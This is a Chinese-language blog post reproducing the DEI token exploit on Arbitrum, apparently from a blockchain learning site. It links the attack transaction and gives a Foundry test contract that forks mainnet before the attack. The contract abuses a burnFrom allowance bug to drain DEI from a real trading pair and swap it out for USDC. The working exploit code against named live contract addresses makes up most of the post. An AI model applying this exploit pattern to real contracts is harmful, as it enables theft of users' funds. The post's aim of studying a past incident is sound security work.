{"content":{"title":"DEI漏洞复现","body":"# 1.\t漏洞简介\r\nhttps://twitter.com/eugenioclrc/status/1654576296507088906\r\n\r\n![1.png](https://img.learnblockchain.cn/attachments/2023/05/nJgpWIQK64590bd29b03a.png)\r\n# 2.\t相关地址或交易\r\nhttps://explorer.phalcon.xyz/tx/arbitrum/0xb1141785b7b94eb37c39c37f0272744c6e79ca1517529fec3f4af59d4c3c37ef    攻击交易\r\n# 3.\t获利分析\r\n\r\n![3.png](https://img.learnblockchain.cn/attachments/2023/05/TDlsuCKO64590c023e811.png)\r\n# 5.\t漏洞复现\r\n\r\n```// SPDX-License-Identifier: LGPL-3.0-only\r\npragma solidity ^0.8.10;\r\n\r\n//import  \"../interfaces/interface.sol\";\r\nimport \"forge-std/Test.sol\";\r\nimport \"./interface.sol\";\r\nimport \"../contracts/ERC20.sol\";\r\n\r\ninterface DEI {\r\n    function burnFrom(address account, uint256 amount) external;\r\n}\r\n\r\ninterface AMM {\r\n    function sync() external;\r\n    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;\r\n    function getAmountOut(uint amountIn, address tokenIn) external returns(uint256);\r\n\r\n}\r\n\r\ncontract ContractTest is Test{\r\n\r\n    address constant dei = 0xDE1E704dae0B4051e80DAbB26ab6ad6c12262DA0;\r\n    address constant victim = 0x7DC406b9B904a52D10E19E848521BbA2dE74888b;\r\n    address constant usdc = 0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8;\r\n\r\n \r\n\r\n    CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);\r\n\r\n    function setUp() public {\r\n        cheats.createSelectFork(\"arbitrum\", 87626026 -2);\r\n        //uint256 forkId = cheats.createFork(\"bsc\");\r\n        //cheats.selectFork(forkId);\r\n\r\n    }\r\n    \r\n    function testExploit() external {\r\n        IERC20(dei).approve(victim,type(uint256).max);\r\n        DEI(dei).burnFrom(victim, 0);\r\n        emit log_named_decimal_uint(\"Attacker DEI allowance\", IERC20(dei).allowance(victim,address(this)), 18);\r\n        \r\n        uint256 victimNum = IERC20(dei).balanceOf(victim);\r\n        emit log_named_decimal_uint(\"victim DEI allowance\", victimNum, 18);\r\n        IERC20(dei).transferFrom(victim,address(this),victimNum-1);\r\n        AMM(victim).sync();\r\n        emit log_named_decimal_uint(\"After attack,Attacker DEI allowance\",IERC20(dei).balanceOf(address(this)), 18);\r\n        uint outNum = AMM(victim).getAmountOut(victimNum-1, dei);\r\n        emit log_named_decimal_uint(\"outNUm is :\",outNum, 18);\r\n\r\n        IERC20(dei).transfer(victim,victimNum-1);\r\n        AMM(victim).swap(0, outNum, address(this), \"\");\r\n        \r\n        emit log_named_decimal_uint(\"After attacker's usdc is :\",IERC20(usdc).balanceOf(address(this)), 6);\r\n\r\n    }\r\n}\r\n```"},"author":{"user":"https://learnblockchain.cn/people/10579","address":null},"history":null,"timestamp":1683557467,"version":1}